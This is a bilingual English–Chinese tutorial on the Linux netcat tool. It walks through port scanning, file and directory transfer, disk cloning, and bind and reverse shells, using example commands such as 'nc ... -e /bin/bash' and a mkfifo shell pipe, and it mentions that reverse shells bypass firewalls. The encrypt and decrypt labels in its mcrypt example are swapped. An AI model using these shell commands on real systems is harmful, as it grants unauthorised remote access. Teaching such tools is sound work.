| netcat是網絡工具中的瑞士軍刀,它能通過TCP和UDP在網絡中讀寫數據。通過與其他工具結合和重定向,你可以在腳本中以多種方式使用它。使用netcat命令所能完成的事情令人驚訝。 netcat所做的就是在兩台電腦之間建立鏈接並返回兩個數據流,在這之后所能做的事就看你的想像力了。你能建立一個服務器,傳輸文件,與朋友聊天,傳輸流媒體或者用它作為其它協議的獨立客戶端。 下面是一些使用netcat的例子. [A(172.31.100.7) B(172.31.100.23)] |
|
|
Linux netcat command examples1. Port scanningPort scanning is done by system admin and hackers to find the open ports at some machine. It helps them to identify the venerability in the system. $nc -z -v -n 172.31.100.7 21-25 It can work in both TCP and UDP mode, default is TCP mode, to change to udp use -u option z option tell netcat to use zero IO .i.e the connection is closed as soon as it opens and no actual data exchange take place. This command will print all the open ports between 21 to 25. Banner is a text that services sends when you connects to them. Banner are very usefull when you are trying to velberability in the system as it identify the type and version of the services. NOTE not all services may send banner. $ nc -v 172.31.100.7 21 The Linux netcat command will connect to open port 21 and will print the banner of the service running at that port. |
譯者信息 Linux netcat 命令實例: 1,端口掃描端口掃描經常被系統管理員和黑客用來發現在一些機器上開放的端口,幫助他們識別系統中的漏洞。 $nc -z -v -n 172.31.100.7 21-25可以運行在TCP或者UDP模式,默認是TCP,-u參數調整為udp. z 參數告訴netcat使用0 IO,連接成功后立即關閉連接, 不進行數據交換(謝謝@jxing 指點) v 參數指使用冗余選項(譯者注:即詳細輸出) n 參數告訴netcat 不要使用DNS反向查詢IP地址的域名 這個命令會打印21到25 所有開放的端口。Banner是一個文本,Banner是一個你連接的服務發送給你的文本信息。當你試圖鑒別漏洞或者服務的類型和版本的時候,Banner信息是非常有用的。但是,並不是所有的服務都會發送banner。 一旦你發現開放的端口,你可以容易的使用netcat 連接服務抓取他們的banner。 $ nc -v 172.31.100.7 21netcat 命令會連接開放端口21並且打印運行在這個端口上服務的banner信息。 |
|
2. Chat ServerIf you want to chat with your friend there are numerous software and messenger services available at your disposal.But what if you do not have that luxury anymore like inside your computer lab, where all outside connections are restricted, how will you communicate to your friend who is sitting in the next room. Don’t worry my friend because netcat has a solution for you just create a chat server and a predetermined port and he can connects to you. Server $nc -l 1567 The Linux netcat command starts a tcp server at port 1567 with stdout and stdin for input output stream i.e. The output is displayed at the shell and input is read from shell. Client $nc 172.31.100.7 1567 After this whatever you type on machine B will appear on A and vice-versa. |
譯者信息 Chat Server假如你想和你的朋友聊聊,有很多的軟件和信息服務可以供你使用。但是,如果你沒有這么奢侈的配置,比如你在計算機實驗室,所有的對外的連接都是被限制的,你怎樣和整天坐在隔壁房間的朋友溝通那?不要郁悶了,netcat提供了這樣一種方法,你只需要創建一個Chat服務器,一個預先確定好的端口,這樣子他就可以聯系到你了。 Server $nc -l 1567 netcat 命令在1567端口啟動了一個tcp 服務器,所有的標准輸出和輸入會輸出到該端口。輸出和輸入都在此shell中展示。 Client $nc 172.31.100.7 1567不管你在機器B上鍵入什么都會出現在機器A上。 |
|
3. File transferMost of the time we are trying to transfer file over network and stumble upon the problem which tool to use. There are again numerous methods available like FTP, SCP, SMB etc. But is it really worth the effort to install and configure such complicated software and create a sever at your machine when you only need to transfer one file and only once. Suppose you want to transfer a file “file.txt” from A to B Server $nc -l 1567 < file.txt Client $nc -n 172.31.100.7 1567 > file.txt Here we have created a server at A at redirected the netcat input from file file.txt, So when any connection is successfull the netcat send the content of the file. Again at the client we have redirect the output of netcat to file.txt. When B connects to A , A sends the file content and B save that content to file file.txt. It is not necessary do create the source of file as server we can work in the eopposeit order also. Like in the below case we are sending file from B to A but server is created at A. This time we only need to redirect ouput of netcat at to file and input at B from file. B as server $nc -l 1567 > file.txt Client $nc 172.31.100.23 1567 < file.txt |
譯者信息 3,文件傳輸大部分時間中,我們都在試圖通過網絡或者其他工具傳輸文件。有很多種方法,比如FTP,SCP,SMB等等,但是當你只是需要臨時或者一次傳輸文件,真的值得浪費時間來安裝配置一個軟件到你的機器上嘛。假設,你想要傳一個文件file.txt 從A 到B。A或者B都可以作為服務器或者客戶端,以下,讓A作為服務器,B為客戶端。 Server $nc -l 1567 < file.txtClient $nc -n 172.31.100.7 1567 > file.txt這里我們創建了一個服務器在A上並且重定向netcat的輸入為文件file.txt,那么當任何成功連接到該端口,netcat會發送file的文件內容。 在客戶端我們重定向輸出到file.txt,當B連接到A,A發送文件內容,B保存文件內容到file.txt. 沒有必要創建文件源作為Server,我們也可以相反的方法使用。像下面的我們發送文件從B到A,但是服務器創建在A上,這次我們僅需要重定向netcat的輸出並且重定向B的輸入文件。 B作為Server Server $nc -l 1567 > file.txt Client nc 172.31.100.23 1567 < file.txt |
4. Directory transferSending file is easy but what if we want to send more than one files, or a whole directory, its easy just use archive tool tar to archive the files first and then send this archive. Suppose you want to transfer a directory over the network from A to B. Server $tar -cvf – dir_name | nc -l 1567 Client $nc -n 172.31.100.7 1567 | tar -xvf - Here at server A we are creating the tar archive and redirecting its outout at the console through -. Then we are piping it to netcat which is used to send it over network. At Client we are just downloading the archive file from the server using the netcat and piping its output tar tool to extract the files. Want to conserve bandwidth by compressing the archive, we can use bzip2 or other tool specific to content of files. Server $tar -cvf – dir_name| bzip2 -z | nc -l 1567 Compress the archive using the bzip2 utility. Client $nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf - Decompress the archive using bzip2 archive |
譯者信息 4,目錄傳輸發送一個文件很簡單,但是如果我們想要發送多個文件,或者整個目錄,一樣很簡單,只需要使用壓縮工具tar,壓縮后發送壓縮包。 如果你想要通過網絡傳輸一個目錄從A到B。 Server $tar -cvf – dir_name | nc -l 1567 Client
$nc -n 172.31.100.7 1567 | tar -xvf -這里在A服務器上,我們創建一個tar歸檔包並且通過-在控制台重定向它,然后使用管道,重定向給netcat,netcat可以通過網絡發送它。 在客戶端我們下載該壓縮包通過netcat 管道然后打開文件。 如果想要節省帶寬傳輸壓縮包,我們可以使用bzip2或者其他工具壓縮。 Server
$tar -cvf – dir_name| bzip2 -z | nc -l 1567 通過bzip2壓縮 Client
$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -使用bzip2解壓 |
|
5. Encrypt your data when sending over the networkIf you are worried about the security of data being sent over the network you can encrypt your data before sending using some tool like mcrypt. Server $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt Encrypt the data using the mcrypt tool. Client $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567 Decrypt the data using the mcrypt tool. Here we have used mcrypt for encryption but any tool can be used. |
譯者信息 5. 加密你通過網絡發送的數據如果你擔心你在網絡上發送數據的安全,你可以在發送你的數據之前用如mcrypt的工具加密。 服務端 $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt使用mcrypt工具加密數據。 客戶端 $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567使用mcrypt工具解密數據。 以上兩個命令會提示需要密碼,確保兩端使用相同的密碼。 這里我們是使用mcrypt用來加密,使用其它任意加密工具都可以。 |
|
6. Stream a videoNot the best method to stream but if the server doesn’t have the specific tools, then with netcat we still have hope. Server $cat video.avi | nc -l 1567 Here we are just reading the video file and redirecting its output to netcat $nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 - Here we are reading the data from the socket and redirecting it to mplayer. |
譯者信息 6. 流視頻雖然不是生成流視頻的最好方法,但如果服務器上沒有特定的工具,使用netcat,我們仍然有希望做成這件事。 服務端 $cat video.avi | nc -l 1567這里我們只是從一個視頻文件中讀入並重定向輸出到netcat客戶端 $nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 - 這里我們從socket中讀入數據並重定向到mplayer。 |
|
7. Cloning a deviceIf you have just installed and configured a Linux machine and have to do the same to other machine too and do not want to do the configuration again. No need to repeat the process just boot the other machine with some boot-able pen drive and clone you machine. Cloning a linux PC is very simple. Suppose your system disk is /dev/sda $dd if=/dev/sda | nc -l 1567 Client $nc -n 172.31.100.7 1567 | dd of=/dev/sda dd is a tool which reads the raw data from the disk, we are just redirecting its output stream through a netcat server to the other machine and writing it to the disk, it will copy everything along with the partition table. But if we have already done the partition and need to move only the root partition we can change sda with sda1, sda2 etc depending where out root is installed. |
譯者信息 7,克隆一個設備如果你已經安裝配置一台Linux機器並且需要重復同樣的操作對其他的機器,而你不想在重復配置一遍。不在需要重復配置安裝的過程,只啟動另一台機器的一些引導可以隨身碟和克隆你的機器。 克隆Linux PC很簡單,假如你的系統在磁盤/dev/sda上 Server $dd if=/dev/sda | nc -l 1567Client $nc -n 172.31.100.7 1567 | dd of=/dev/sdadd是一個從磁盤讀取原始數據的工具,我通過netcat服務器重定向它的輸出流到其他機器並且寫入到磁盤中,它會隨着分區表拷貝所有的信息。但是如果我們已經做過分區並且只需要克隆root分區,我們可以根據我們系統root分區的位置,更改sda 為sda1,sda2.等等。 |
|
8. Opening a shellWe have used remote Shell using the telnet and ssh but what if they are not installed and we do not have the permission to install them, then we can create remote shell using netcat also. If your netcat support -c and -e option (traditional netcat) $nc -l 1567 -e /bin/bash -i Client $nc 172.31.100.7 1567 Here we have created a netcat server and indicated it to run /bin/bash command when connection is successful. If netcat doesn’t support -c or -e options(openbsd netcat) we can still crate remote shell. $mkfifo /tmp/tmp_fifo $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo Here we have created a fifo. Then we have piped the content of this fifo file using pipe command to a shell 2>&1 is used to redirect stderr to same file where stdout is redirected which is piped to netcat server running at port 1567. Now here again we have redirected the output of netcat to fifo file. Explanation: The input received from network is written to fifo file. The fifo file is read by cat command and it content is sent to sh command. Sh command processes the received input and write it back to netcat. Netcat send the output over the network to client. All this is possible because pipe causes the command to run in parallel. The fifo file is used instead of regular file because the fifo causes the read to wait while if it was an ordinary file the cat command would have ended as soon as started reading an empty file. At client is just as simple as conecting to server $nc -n 172.31.100.7 1567 And you will get a shell prompt at the client |
譯者信息 8,打開一個shell我們已經用過遠程shell-使用telnet和ssh,但是如果這兩個命令沒有安裝並且我們沒有權限安裝他們,我們也可以使用netcat創建遠程shell。 假設你的netcat支持 -c -e 參數(默認 netcat) Server $nc -l 1567 -e /bin/bash -iClient $nc 172.31.100.7 1567這里我們已經創建了一個netcat服務器並且表示當它連接成功時執行/bin/bash 假如netcat 不支持-c 或者 -e 參數(openbsd netcat),我們仍然能夠創建遠程shell Server $mkfifo /tmp/tmp_fifo $cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo這里我們創建了一個fifo文件,然后使用管道命令把這個fifo文件內容定向到shell 2>&1中。是用來重定向標准錯誤輸出和標准輸出,然后管道到netcat 運行的端口1567上。至此,我們已經把netcat的輸出重定向到fifo文件中。 說明: 從網絡收到的輸入寫到fifo文件中 cat 命令讀取fifo文件並且其內容發送給sh命令 sh命令進程受到輸入並把它寫回到netcat。 netcat 通過網絡發送輸出到client 至於為什么會成功是因為管道使命令平行執行,fifo文件用來替代正常文件,因為fifo使讀取等待而如果是一個普通文件,cat命令會盡快結束並開始讀取空文件。 在客戶端僅僅簡單連接到服務器 Client $nc -n 172.31.100.7 1567你會得到一個shell提示符在客戶端 |
|
9. Reverse ShellReverse shell are shell opened at the client side. Reverse shell are so named because unlike other configuration here server is using the services provided by the client. Server $nc -l 1567 At the client side simply tell netcat to execute the shell when connection is complete. Client $nc 172.31.100.7 1567 -e /bin/bash Now what is so special about reverse shell. |
譯者信息 反向shell反向shell是指在客戶端打開的shell。反向shell這樣命名是因為不同於其他配置,這里服務器使用的是由客戶提供的服務。 服務端 $nc -l 1567在客戶端,簡單地告訴netcat在連接完成后,執行shell。 客戶端 $nc 172.31.100.7 1567 -e /bin/bash現在,什么是反向shell的特別之處呢 反向shell經常被用來繞過防火牆的限制,如阻止入站連接。例如,我有一個專用IP地址為172.31.100.7,我使用代理服務器連接到外部網絡。如果我想從網絡外部訪問 這台機器如1.2.3.4的shell,那么我會用反向外殼用於這一目的。 |
轉載:https://www.oschina.net/translate/linux-netcat-command?cmp